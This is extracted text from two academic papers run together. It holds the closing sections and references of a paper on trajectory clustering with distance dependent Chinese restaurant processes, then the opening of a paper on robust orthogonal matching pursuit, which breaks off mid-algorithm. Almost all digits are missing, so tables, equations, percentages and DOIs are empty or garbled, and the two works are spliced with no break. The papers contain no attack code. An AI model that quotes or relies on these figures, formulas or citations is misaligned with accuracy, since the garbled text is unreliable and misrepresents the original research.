the course of experiments to achieve their maximum accuracy. for the proposed methods, collapsed gibbs was performed for samples. after each sampling, ccr was evaluated based on the customer assignment result. figure shows ccr per sample for the lankershim and cross datasets. arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure clustering accuracy of (a) the cross dataset, (b) the lankershim dataset. full-size doi: . /peerjcs. /fig- table the ccr performance of different methods for the cross dataset. number of clusters dtw . . . . . . . . lcss . . . . . . . . mh . . . . . . . . dual hdp – – – – – . – – ddcrp (dtw) – – – . – – – – ddcrp (lcss) – – – . – – – – ddcrp (mh) – – – . – – – – in all methods, ccr achieves greater than . after the rd sample. the average ccr is obtained by averaging the ccr values after neglecting the first ten samples. the results of trajectory clustering accuracy for the cross dataset are summarized in table . the best correct clustering rate is obtained by ddcrp when using lcss as a distance measure which produces . . the average correct clustering rate of lcss with traditional clustering algorithm is . . while this value is slightly less than the performance produced by lcss and ddcrp, it needs to be highlighted that traditional clustering techniques achieved . correct clustering rate with the assumption of knowing the true total number of clusters. also, the proposed method improves the correct clustering rate regardless of which similarity method is used. in other words, using dtw and mh as similarity measure along with ddcrp achieve better average ccr compared to traditional clustering algorithms. similarly, table summarizes the clustering accuracy for the lankershim dataset. using ddcrp along with mh distance produces the best correct clustering rate of . . same as cross dataset, the proposed method improves correct clustering rate regardless of which similarity measure is used. the most notable improvement is when dtw is used as arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table the ccr performance of different methods for the lankershim dataset. number of clusters dtw . . . . . . . . lcss . . . . . . . . mh . . . . . . . . dual hdp – – – . – – – – ddcrp (dtw) – – – – . – – – ddcrp (lcss) – – – – . – – – ddcrp (mh) – – – – . – – – a b figure founded clusters: (a) the cross dataset by using the ddcrp and the lcss distance meth- ods, (b) the lankershim dataset by using the ddcrp and the mh distance methods. full-size doi: . /peerjcs. /fig- a similarity measure. in this case, the average ccr for similarity-based clustering is . while the combination of dtw and ddcrp results in the ccr of . . after removing clusters with single trajectory and ignoring the initial samples, methods based on ddcrp discovered clusters for both the cross and the lankershim datasets. figure shows the discovered clusters in the th sample for the cross and lankershim datasets. the results shown in this figure are obtained by ddcrp using lcss and mh distances for the cross and lankershim respectively. the discovered clusters are typical activities in an intersection and include crossing the intersection, turning left, turning right, and u-turn. as discussed in the trajectory analysis with distance dependent crp section, the size of the grid impacts the accuracy of any ptm-based trajectory analysis system. another advantage of the proposed method compared to the dual-hdp method is that it is less sensitive to the choice of grid size. this is due to the fact that most ptm models, including dual hdp, are based only on bag-of-grids representation of the trajectories. the proposed method, however, uses both bag-of-grids and pairwise distance between raw trajectories. therefore, it can be expected that the proposed method is less sensitive to the choice of grid sizes. arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure the impact of grid size on the clustering accuracy: (a) the cross dataset, (b) the lanker- shim dataset. full-size doi: . /peerjcs. /fig- figure shows the average the ccr of the ddcrp and dual-hdp systems for different sizes of the grid. the grid size of × and × pixels produces . and . correct clustering rate for the dual-hdp method in the cross and lankershim datasets respectively. however, the accuracy substantially decreases by increasing or decreasing the grid size. the proposed method, however, is more robust to the choice of grid size since the pairwise distance between trajectories is independent of the choice of grid size. the aim of trajectory path modelling is to discover the paths commonly taken by objects in each cluster. one benefit of our method is its ability to model the path simultaneous to trajectory clustering. in our study, each path is characterized by the distribution over grid cells in a scene. each cell for a path can be associated to any number in the range of to , where are the cells that have no chance of being observed in that path. as the values of a cell are closer to , this cell become more essential for the path, and the probability of it being passed by trajectories belonging to that path increases. the path modelling experiments were conducted with the same parameter setup discussed earlier in this section. figure shows the cluster models for the cross and lankershim datasets. the blue cells are less likely to be observed by trajectories in that cluster. conversely, the red cells are more probably observed by trajectories. then most paths have their probable grid cells in the middle of their route, while when moving further away to the edges of the routes, the probability of grid cells decreases. conclusion this paper proposed an unsupervised approach for trajectory clustering and modelling. the generative process of trajectory analysis was modelled via a probabilistic model. the pairwise distances were used as prior in ddcrp to promoting similar trajectories to be clustered. the ddcrp were used to combine the advantages of similarity-based and ptm-based approaches. compared to probabilistic topic approaches, our method is able to model the full path taken by agents in each cluster. unlike most similarity-based methods, arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. a b figure cluster models: (a) the cross dataset, (b) the lankershim dataset. full-size doi: . /peerjcs. /fig- our method drives the number of clusters automatically. the proposed trajectory analysis system clusters the trajectories and models the clusters’ paths at the same time. specifically, raw trajectories were converted to bag-of-grid cells representation and considered each cluster with its distribution over the grids. experimental results confirmed the effectiveness and usefulness of the proposed algorithm in trajectory clustering and modelling compared to other methods. the proposed approach is planned to have an online learning capability, where the cluster and path models keep updated as more data is observed. additional information and declarations funding this work was supported by the ministry of education malaysia by through a research university grant of university technology malaysia (utm), project titled ‘‘intelligent fault detection and diagnosing for process plant r.k . . j .’’ the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: ministry of education malaysia by through a research university grant of university technology malaysia (utm). competing interests the authors declare there are no competing interests. author contributions • reza arfa, rubiyah yusof and parvaneh shabanzadeh conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. computation work, authored or reviewed drafts of the paper, approved the final draft, the authors contributed equally to the completion of the manuscript. data availability the following information was supplied regarding data availability: the code is available at: https://github.com/rezaarfa/motionlearning and in the supplemental information. the cross dataset can be downloaded from http://cvrr.ucsd.edu/bmorris/datasets/ dataset_trajectory_analysis.html. the lankershim is part of the ngsim dataset and can be downloaded from https://ops.fhwa.dot.gov/trafficanalysistools/ngsim.htm. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aköz Ö, karsligil me. . traffic event classificati on at intersections based on the severity of abnormality. machine vision and applications : – doi . /s - - - . atev s, miller g, papanikolopoulos np. . clustering of vehicle trajecto- ries. ieee transactions on intelligent transportation systems : – doi . /tits. . . baldassano c, beck dm, li f-f. . parcellating connectivity in spatial maps. peerj :e doi . /peerj. . blei dm, frazier pi. . distance dependent chinese restaurant processes. journal of machine learning research : – . dee hm, velastin sa. . how close are we to solving the problem of automated visual surveillance? machine vision and applications : – doi . /s - - -z. fox eb, sudderth eb, willsky as. . hierarchical dirichlet processes for tracking maneuvering targets. in: th international conference on information fusion. ieee, – doi . /icif. . . gershman sj, blei dm. . a tutorial on bayesian nonparametric models. journal of mathematical psychology : – doi . /j.jmp. . . . ghosh s, ungureanu ab, sudderth eb, blei dm. . spatial distance dependent chinese restaurant processes for image segmentation. in: proceedings of the th international conference on neural information processing systems. granada, spain: curran associates inc., – . jeong h, chang hj, choi jy. . modeling of moving object trajectory by spatio- temporal learning for abnormal behavior detection. in: advanced video and signal- based surveillance (avss), th ieee international conference on. piscataway: ieee, – doi . /avss. . . arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/rezaarfa/motionlearning http://dx.doi.org/ . /peerj-cs. #supplemental-information http://cvrr.ucsd.edu/bmorris/datasets/dataset_trajectory_analysis.html http://cvrr.ucsd.edu/bmorris/datasets/dataset_trajectory_analysis.html https://ops.fhwa.dot.gov/trafficanalysistools/ngsim.htm http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /icif. . http://dx.doi.org/ . /j.jmp. . . http://dx.doi.org/ . /avss. . http://dx.doi.org/ . /peerj-cs. jonsen id, myers ra, flemming jm. . meta-analysis of animal movement using state-space models. ecology : – doi . / - . joseph j, doshi-velez f, huang as, roy n. . a bayesian nonparametric approach to modeling motion patterns. autonomous robots : – doi . /s - - -x. keogh ej, pazzani mj. . scaling up dynamic time warping for datamining applications. in: proceedings of the sixth acm sigkdd international confer- ence on knowledge discovery and data mining. new york: acm, – doi . / . . lei s, fan j, zhongke s, molina r, katsaggelos ak. . toward dynamic scene un- derstanding by hierarchical motion pattern mining. ieee transactions on intelligent transportation systems : – doi . /tits. . . makris d, ellis t. . learning semantic scene models from observing activity in visual surveillance. ieee transactions on systems, man, and cybernetics, part b (cybernetics) : – doi . /tsmcb. . . morris b, trivedi m. . learning trajectory patterns by clustering: experimental stud- ies and comparative evaluation. in: ieee conference on computer vision and pattern recognition, . piscataway: ieee, – doi . /cvpr. . . morris bt, trivedi mm. . trajectory learning for activity understanding: unsuper- vised, multilevel, and long-term adaptive approach. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . ng ay, jordan mi, weiss y. . on spectral clustering: analysis and an algorithm. in: proceedings of the th international conference on neural information processing systems: natural and synthetic. vancouver, british columbia, canada: mit press, – . ngsim: next generation simulation. . in. . available at www.ngsim.fhwa.dot. gov: fhwa, u.s. department of transportation. pao h-k, fadlil j, lin h-y, chen k-t. . trajectory analysis for user verification and recognition. knowledge-based systems : – doi . /j.knosys. . . . papadopoulos an. . trajectory retrieval with latent semantic analysis. in: proceed- ings of the acm symposium on applied computing. new york: acm, – . pitman j. . combinatorial stochastic processes. technical report . available at https://www.stat.berkeley.edu/~pitman/ .pdf . reed m, johansen Ø, brandvik pj, daling p, lewis a, fiocco r, mackay d, prentki r. . oil spill modeling towards the close of the th century: overview of the state of the art. spill science & technology bulletin : – doi . /s - ( ) - . ren q, wang q, zhang j, chen s. . unordered images selection for dense d re- construction based on distance dependent chinese restaurant process. in: intelligent control and automation (wcica), th world congress on. ieee, – doi . /wcica. . . arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . / . http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /tsmcb. . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /tpami. . www.ngsim.fhwa.dot.gov www.ngsim.fhwa.dot.gov http://dx.doi.org/ . /j.knosys. . . https://www.stat.berkeley.edu/~pitman/ .pdf http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /wcica. . http://dx.doi.org/ . /peerj-cs. tian b, morris bt, tang m, liu y, yao y, gou c, shen d, tang s. . hierarchical and networked vehicle surveillance in its: a survey. ieee transactions on intelligent transportation systems : – doi . /tits. . . vlachos m, kollios g, gunopulos d. . discovering similar multidimensional trajectories. in: th international conference on data engineering, . piscataway: ieee, – doi . /icde. . . wang x, ma kt, ng g-w, grimson wel. . trajectory analysis and semantic region modeling using nonparametric hierarchical bayesian models. international journal of computer vision : – doi . /s - - - . weiming h, xi l, guodong t, maybank s, zhongfei z. . an incremental dpmm-based method for trajectory clustering, modeling, and retrieval. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . weiming h, xuejuan x, zhouyu f, xie d, tieniu t, maybank s. . a system for learning statistical motion patterns. ieee transactions on pattern analysis and machine intelligence : – doi . /tpami. . . xi l, weiming h, wei h. . a coarse-to-fine strategy for vehicle motion trajectory clustering. in: th international conference on pattern recognition, . – doi . /icpr. . . yiwen w, tze iy, keathly d, buckles b. . dynamic scene modelling and anomaly detection based on trajectory analysis. iet intelligent transport systems : – doi . /iet-its. . . zhang t, lu h, li sz. . learning semantic scene models by object classification and trajectory clustering. in: ieee conference on computer vision and pattern recognition. piscataway: ieee, – doi . /cvpr. . . zhang z, kaiqi h, tieniu t. . comparison of similarity measures for trajectory clustering in outdoor surveillance scenes. in: th international conference on pattern recognition, . – doi . /icpr. . . arfa et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tits. . http://dx.doi.org/ . /icde. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /tpami. . http://dx.doi.org/ . /icpr. . http://dx.doi.org/ . /iet-its. . http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . /icpr. . http://dx.doi.org/ . /peerj-cs. submitted january accepted april published may corresponding author carlos a. loza, cloza@usfq.edu.ec academic editor mikael skoglund additional information and declarations can be found on page doi . /peerj-cs. copyright loza distributed under creative commons cc-by . open access robomp: robust variants of orthogonal matching pursuit for sparse representations carlos a. loza department of mathematics, universidad san francisco de quito, quito, ecuador abstract sparse coding aims to find a parsimonious representation of an example given an observation matrix or dictionary. in this regard, orthogonal matching pursuit (omp) provides an intuitive, simple and fast approximation of the optimal solution. however, its main building block is anchored on the minimization of the mean squared error cost function (mse). this approach is only optimal if the errors are distributed according to a gaussian distribution without samples that strongly deviate from the main mode, i.e. outliers. if such assumption is violated, the sparse code will likely be biased and performance will degrade accordingly. in this paper, we introduce five robust variants of omp (robomp) fully based on the theory of m-estimators under a linear model. the proposed framework exploits efficient iteratively reweighted least squares (irls) techniques to mitigate the effect of outliers and emphasize the samples corresponding to the main mode of the data. this is done adaptively via a learned weight vector that models the distribution of the data in a robust manner. experiments on synthetic data under several noise distributions and image recognition under different combinations of occlusion and missing pixels thoroughly detail the superiority of robomp over mse-based approaches and similar robust alternatives. we also introduce a denoising framework based on robust, sparse and redundant representations that open the door to potential further applications of the proposed techniques. the five different variants of robomp do not require parameter tuning from the user and, hence, constitute principled alternatives to omp. subjects algorithms and analysis of algorithms, artificial intelligence, computer vision, data mining and machine learning, data science keywords m-estimation, matching pursuit, representation-based classifier, robust classification, sparse representation, outliers introduction sparse modeling is a learning framework with relevant applications in areas where parsimonious representations are considered advantageous, such as signal processing, machine learning, and computer vision. dictionary learning, image denoising, image super–resolution, visual tracking and image classification constitute some of the most celebrated applications of sparse modeling (aharon, elad & bruckstein, ; elad & aharon, ; mallat, ; wright et al., ; elad, figueiredo & ma, ; xu et al., ). strictly speaking, sparse modeling refers to the entire process of designing and learning a model, while sparse coding, sparse representation, or sparse decomposition is how to cite this article loza ca. . robomp: robust variants of orthogonal matching pursuit for sparse representations. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:cloza@usfq.edu.ec https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. an inference process—estimation of the latent variables of such model. the latter formally emerged as a machine learning adaptation of the sparse coding scheme found in the mammalian primary visual cortex (olshausen & field, ). the sparse coding problem is inherently combinatorial and, therefore, intractable in practice. thus, classic solutions involve either greedy approximations or relaxations of the original ` -pseudonorm. examples of the former family of algorithms include matching pursuit (mp) and all of its variants (mallat & zhang, ), while basis pursuit (chen, donoho & saunders, ) and lasso (tibshirani, ) are the archetypes of the latter techniques. particularly, orthogonal matching pursuit (omp) is usually regarded as more appealing due to its efficiency, convergence properties, and simple, intuitive implementation based on iterative selection of the most correlated predictor to the current residual and batch update of the entire active set (tropp & gilbert, ). the success of omp is confirmed by the many variants proposed in the literature. wang, kwon & shim ( ) introduced generalized omp (gomp) where more than one predictor or atom (i.e., columns of the measurement matrix or dictionary) are selected per iteration. regularized omp (romp) exploits a predefined regularization rule (needell & vershynin, ), while cosamp incorporates additional pruning steps to refine the estimate recursively (needell & tropp, ). the implicit foundation of the aforementioned variants—and, hence, of the original omp—is optimization based on ordinary least squares (ols), which is optimal under a mean squared error (mse) cost function or, equivalently, a gaussian distribution of the errors. any deviation from such assumptions, e.g., outliers, impulsive noise or non–gaussian additive noise, would result in biased estimations and performance degradation in general. wang, tang & li ( ) proposed correntropy matching pursuit (cmp) to mitigate the detrimental effect of outliers in the sparse coding process. basically, the correntropy induced metric replaces the mse as the cost function of the iterative active set update of omp. consequently, the framework becomes robust to outliers and impulsive noise by weighing the input samples according to a gaussian kernel. the resulting non–convex performance surface is optimized via the half–quadratic (hq) technique to yield fast, iterative approximations of local optima (geman & yang, ; nikolova & ng, ). even though the algorithm is successful in alleviating the effect of outliers in practical applications, the main hyperparameter—the gaussian kernel bandwidth—is chosen empirically with no theoretical validation. with this mind, we propose a generalization of cmp by reformulating the active set update under the lens of robust linear regression; specifically, we exploit the well known and developed theory of m–estimators (andersen, ; huber, ) to devise five different robust variants of omp: robomp. each one utilizes validated hyperparameters that guarantee robustness up to theoretical limits. in addition, the hq optimization technique is reduced to the iteratively reweighted least squares (irls) algorithm in order to provide an intuitive and effective implementation while still enjoying the weighing nature introduced in cmp. for instance, fig. illustrates the estimated error in a –dimensional observation vector with a % rate of missing samples (set equal to zero). while tukey–estimator– based–omp practically collapses the error distribution after decompositions, the omp loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure illustration of the robustness of the proposed method. (a) y ∈ ir constitutes an observation vector with five missing samples (set to zero, marked in red). (b) eomp and (c) eomp are the resulting errors after the first and tenth iteration of omp (with corresponding box plots as insets), respectively. (d) xomp is the final estimated sparse decomposition after omp iterations. their robomp counterparts (tukey estimator) (f–g) reduce more aggressively the dynamic range of the errors until almost collapsing to a delta distribution; this results in optimal sparse coding (h). (e) wtukey is the learned weight vector that assigns values close to one to values around the main mode of the data and small weights to poten- tial outliers (red marks). number of iterative sparse decompositions equal to ground truth cardinality of sparse active set, i.e., k =k = . full-size doi: . /peerjcs. /fig- counterpart still leaves a remnant that derives in suboptimal sparse coding. moreover, robomp provides an additional output that effectively weighs the components of the input space in a [ , ] scale. in particular, the missing samples are indeed assigned weights close to zero in order to alleviate their effect in the estimation of the sparse decomposition. we present three different sets of results to validate the proposed robust, sparse inference framework. first, synthetic data with access to ground truth (support of the representation) highlights the robustness of the estimators under several types of noise, such as additive non–gaussian densities and instance–based degradation (e.g., missing samples and impulsive noise). then, a robust sparse representation–based classifier (rsrc) is developed for image recognition under missing pixels and occlusion scenarios. the results outperform the omp–based variants and the cmp–based classifier (cmpc) for several cases. lastly, preliminary results on image denoising via sparse and redundant representations over overcomplete dictionaries are presented with the hope of exploiting robomp in the future for image denoising under non–gaussian additive noise. the rest of the paper is organized as follows: section details the state of the art and related work concerning greedy approximations to the sparse coding problem. section introduces the theory, rationale, and algorithms regarding m–estimation–based robust omp: robomp. section details the results using synthetic data and popular digital image databases, while section discusses more in–depth technical concepts, analyzes the implications of the loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. proposed framework, and offers potential further work. lastly, section concludes the paper. state of the art and related work let y∈ irm be a measurement vector with an ideal, noiseless, sparse representation, x ∈ irn, with respect to the measurement matrix (also known as dictionary), d∈ irm×n. the matrix d is usually overcomplete, i.e., m < n, to promote sparse decompositions. in practice, y is affected by a noise component, n∈ irm. this results in the following constrained, linear, additive model: y=dx +n s.t. ||x || =k ( ) where k indicates the support of the sparse decomposition and ||·|| represents the ` – pseudonorm, i.e., number of non–zero components in x . the sparse coding framework aims to estimate x given the measurement vector and matrix plus a sparsity constraint. mse–based omp orthogonal matching pursuit (tropp & gilbert, ) attempts to find the locally optimal solution by iteratively estimating the most correlated atom in d to the current residual. in particular, omp initializes the residual r =y, the set containing the indices of the atoms that are part of the decomposition (an active set) =∅, and the iteration k = . in the kth iteration, the algorithm finds the predictor most correlated to the current residual: λk =argmax i∈� |〈rk− ,di〉| ( ) where 〈·,·〉 denotes the inner product operator, di represents the ith column of d, and �={ , ,...,n}. the resulting atom is added to the active set via , i.e.: k = k− ∪λk. ( ) the next step is the major refinement of the original matching pursuit algorithm (mallat & zhang, )—instead of updating the sparse decomposition one component at the time, omp updates all the coefficients corresponding to the active set at once according to a mse criterion xk = argmin x∈irn,supp(x)⊂ k ||y−dx|| ( ) where supp (x) is the support set of vector x. equation ( ) can be readily solved via ols or linear regression where the predictors are the columns of d indexed by k and the response is the measurement vector y. stopping criterion for omp typically include a set number of iterations or compliance with a set minimum error of the residue. in the end, the estimated sparse code, x, is set as the last xk obtained. in practice, the true sparsity pattern, k , is unknown and the total number of omp iterations, k , is treated as a hyperparameter. for a detailed analysis regarding convergence and recovery error bounds of omp, see donoho, elad & temlyakov ( ). a potential drawback of omp is the extra computational complexity added by the ols solver. loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. specifically, each incremental update of the active set affects the time complexity of the algorithm in a polynomial fashion: o(k n+k ) where k is the current iteration. generalized orthogonal matching pursuit (wang, kwon & shim, ) refines omp by selecting n atoms per iteration. if the indices of the active set columns in the kth iteration are denoted as jk[ ],jk[ ],...,jk[n ], then jk[j] can be defined recursively: jk[j]= argmax i∈�\{jk[ ],...,jk[j− ]} |〈rk− ,di〉|, ≤ j≤n ( ) the index set {jk[j]} n j= is then added to k and, likewise omp, gomp exploits an ols solver to update the current active set. both omp and gomp obtain locally optimal solutions under the assumption of gaussianity (or normality) of the errors. yet, if such restriction is violated (e.g., by the presence of outliers), the estimated sparse code, x, will most likely be biased. cmp the main drawback of mse–based cost functions is its weighing nature in terms of influence and importance assigned to the available samples. in particular, mse considers every sample as equally important and assigns a constant weight equal to one to all the inputs. wang, tang & li ( ) proposed exploiting correntropy (liu, pokharel & príncipe, ) instead of mse as an alternative cost function in the greedy sparse coding framework. basically, the novel loss function utilizes the correntropy induced metric (cim) to weigh samples according to a gaussian kernel gσ(t)=exp(−t / σ ), where σ , the kernel bandwidth, modulates the norm the cim will mimic, e.g., for small σ , the cim behaves similar to the ` -pseudonorm (aggressive non–linear weighing), if σ increases, cim will mimic the ` –norm (moderate linear weighing), and, lastly, for large σ , the resulting cost function defaults to mse, i.e., constant weighing for all inputs. the main conclusion here is that the cim, unlike mse, is robust to outliers for a principled choice of σ . this outcome easily generalizes for non–gaussian environments with long–tailed distributions on the errors. correntropy matching pursuit (cmp) exploits the cim robustness to update the active set in the sparse coding solver. the algorithm begins in a similar fashion as omp, i.e., r =y, =∅, and k = . then, instead of the mse–based update of eq. ( ), cmp proceeds to minimize the following cim–based expression: xk = argmin x∈irn,supp(x)⊂ k lσ(y−dx) ( ) where lσ(e)= m ∑m i= σ ( −gσ(e[i])) is the simplified version (without constant terms independent of e) of the cim loss function and e[i] is the ith entry of the vector e. the half–quadratic (hq) technique is utilized to efficiently optimize the invex cim cost function (geman & yang, ; nikolova & ng, ). the result is a local minimum of eq. ( ) alongside a weight vector w that indicates the importance of the components of the observation vector y: w(t+ )[i]=gσ(y[i]−(dx (t))[i]), i= , ,...,m ( ) where t is the iteration in the hq subroutine. in short, the hq optimization performs block coordinate descent to separately optimize the sparse code, x, and the weight vector, loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. w, in order to find local optima. the hyperparameter σ is iteratively updated without manual selection according to the following heuristic: σ (t+ ) = ( m ∥∥∥y−dx(t+ )∥∥∥ ) / . ( ) in wang, tang & li ( ), the authors thoroughly illustrate the advantage of cmp over many mse–based variants of omp when dealing with non-gaussian error distributions and outliers in computer vision applications. and even though they mention the improved performance of the algorithm when σ is iteratively updated versus manual selection scenarios, they fail to explain the particular heuristic behind eq. ( ) or its statistical validity. in addition, the hq optimization technique is succinctly reduced to a weighted least squares problem than can be solved explicitly. therefore, more principled techniques that exploit weighted least squares and robust estimators for linear regression can readily provide the needed statistical validity, while at the same time, generalize the concepts of cmp under the umbrella of m–estimators. robust orthogonal matching pursuit mse–based omp appeals to ols solvers to optimize eq. ( ). in particular, let ∈ irm×k correspond to the active atoms in the dictionary d at iteration k, i.e., =[d k[ ],d k[ ],...,d k[k]], and β∈ ir k be the vector corresponding to the coefficients that solve the following regression problem: y= β+e ( ) where e is an error vector with independent components identically distributed according to a zero–mean normal density (e[i]∼n( ,σ )). then, the least squares regression estimator, β̂, is the maximum likelihood estimator for β under a gaussian density prior, i.e.: β̂=argmax β m∏ i= √ πσ exp ( − e[i] σ ) =argmax β m∏ i= √ πσ exp ( − (y[i]−( β)[i]) σ ) ( ) which is equivalent to maximizing the logarithm of eq. ( ) over β: β̂=argmax β m∑ i= ( − ln( πσ )− e[i] σ ) =argmin β m∑ i= ( e[i] ) . ( ) since σ is assumed as constant, β̂ is the estimator that minimizes the sum of squares of the errors, or residuals. hence, the optimal solution is derived by classic optimization theory giving rise to the well known normal equations and ols estimator: m∑ i= e[i] =et e =(y− β)t (y− β) loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. =yt y−yt β−βt t y+βt t β. at the minimum: δ δβ m∑ i= e[i] = = δ δβ (yt y−yt β−βt t y+βt t β) = − t y− t y+ ( t )β. consequently when t is non–singular, the optimal estimated coefficients vector has a closed–form solution equal to: β̂ols= β̂=( t )− t y ( ) which is optimal under a gaussian distribution of the errors. if such assumption is no longer valid due to outliers or non–gaussian environments, m–estimators provide a suitable alternative to the estimation problem. m–estimators if the errors are not normally distributed, the estimator of eq. ( ) will be suboptimal. hence, a different function is utilized to model the statistical properties of the errors. following the same premises of independence and equivalence of the optimum under the log–transform, the following estimator arises: β̂m−est =argmin β m∑ i= ρ (e[i] s ) =argmin β m∑ i= ρ ((y[i]−( β)[i]) s ) ( ) where ρ(e) is a continuous, symmetric function (also known as the objective function) with a unique minimum at e= (andersen, ). clearly, ρ(e) reduces to half the sum of squared errors for the gaussian case. s is an estimate of the scale of the errors in order to guarantee scale–invariance of the solution. the usual standard deviation cannot be used for s due to its non–robustness; thus, a suitable alternative is usually the ‘‘re–scaled mad’’: s= . ×mad ( ) where the mad (median absolute deviation) is highly resistant to outliers with a breakdown point (bdp) of %, as it is based on the median of the errors (ẽ) rather than their mean (andersen, ): mad=median|e[i]− ẽ|. ( ) the re–scaling factor of . guarantees that, for large sample sizes and e[i]∼n( ,σ ), s reduces to the population standard deviation (hogg, ). m–estimation then, likewise ols, finds the optimal coefficients vector via partial differentiation of eq. ( ) with respect to each of the k parameters in question, resulting in a system of k equations: m∑ i= ijψ (y[i]−φti β s ) = m∑ i= ijψ (e[i] s ) = , j= , ,...,k ( ) loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. where φi represents the ith row of the matrix while ij accesses the jth component of the ith row of .ψ ( e[i] s ) = ∂ρ ∂ e[i] s is known as the score function while the weight function is derived from it as: w[i]=w (e[i] s ) = ψ ( e[i] s ) e[i] s . ( ) substituting eqs. ( ) into ( ) results in: m∑ i= ijw[i] e[i] s = m∑ i= ijw[i](y[i]−φ t i β) s = j= , ,...,k m∑ i= ijw[i](y[i]−φ t i β) s = j= , ,...,k m∑ i= ijw[i]φiβ= m∑ i= ijw[i]y[i] j= , ,...,k ( ) which can be succinctly reduced in matrix form as: t w β= t wy ( ) by defining the weight matrix, w, as a square diagonal matrix with non–zero elements equal to the entries in w, i.e.: w=diag({w[i] : i= , ,...,m}). lastly, if t w is well- conditioned, the closed form solution of the robust m–estimator is equal to: β̂m−est =( t w )− t wy. ( ) equation ( ) resembles its ols counterpart (eq. ( )), except for the addition of the matrix w that weights the entries of the observation vector and mitigates the effect of outliers according to a linear fit. a wide variety of objective functions (and in turn, weight functions) have been proposed in the literature (for a thorough review, see zhang ( )). for the present study, we will focus on five different variants that are detailed in table . every m–estimator weighs its entries according to a symmetric, decaying function that assigns large weights to errors in the vicinity of zero and small coefficients to gross contributions. consequently, the estimators downplay the effect of outliers and samples, in general, that deviate from the main mode of the residuals. solving the m-estimation problem is not as straightforward as the ols counterpart. in particular, eq. ( ) assumes the optimal w is readily available, which, in turn, depends on the residuals, which, again, depends on the coefficient vector. in short, the optimization problem for m–estimators can be posed as finding both β̂m−est and ŵm−est that minimize eq. ( ). likewise half–quadratic, the common approach is to perform block coordinate descent on the cost function with respect to each variable individually until local optima are found. in the robust regression literature, this optimization procedure is the well known iteratively reweighted least squares or irls (andersen, ). the procedure is detailed in algorithm . in particular, the routine runs for either a fixed number of iterations or until the estimates change by less than a selected threshold between iterations. the loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table comparison between ols estimator and m–estimators. objective ρ(e) and weight w(e) func- tions of ols solution and five different m–estimators. for m–estimators, error entries are standardized, i.e. divided by the scale estimator, s. each robust variant comes with a hyperparameter c. exemplary plots in the last column utilize the optimal hyperparameters detailed in table . type ρ(e) w(e) w(e) ols e cauchy c log( +( e c ) ) +(e/c) fair c ( |e| c −log ( + |e|c )) +|e|/c huber{if |e|≤c if |e|≥c {e c ( |e|− c ) { c |e| tukey{ if |e|≤c if |e|>c {c ( − ( − (e c ) ) ) c {( −( e c ) ) welsch c ( −exp(−( e c ) )) exp(−( ec ) ) main hyperparameter is the choice of the robust m–estimator alongside its corresponding parameter c. however, it is conventional to select the value that provides a % asymptotic efficiency on the standard normal distribution (zhang, ). throughout this work, we exploit such optimal values to avoid parameter tuning by the user (see table ). in this way, the influence of outliers and non-gaussian errors are expected to be diminished in the omp update stage of the coefficients corresponding to the active set. m–estimators–based omp here, we combine the ideas behind greedy approximations to the sparse coding problem and robust m–estimators; the result is robomp or robust orthogonal matching pursuit. we propose five variants based on five different m–estimators (table ). we refer to loza ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table optimal hyperparameter c of m–estimators according to a % asymptotic efficiency on the standard normal distribution. cauchy fair huber tukey welsch . . . . . algorithm irls–based m–estimation : function irls(y∈irm, ∈irm×k,wc(u)) fweight function w(u) with hyperparameter c : t ← : β( )=βols←( t )− t y fols initialization : 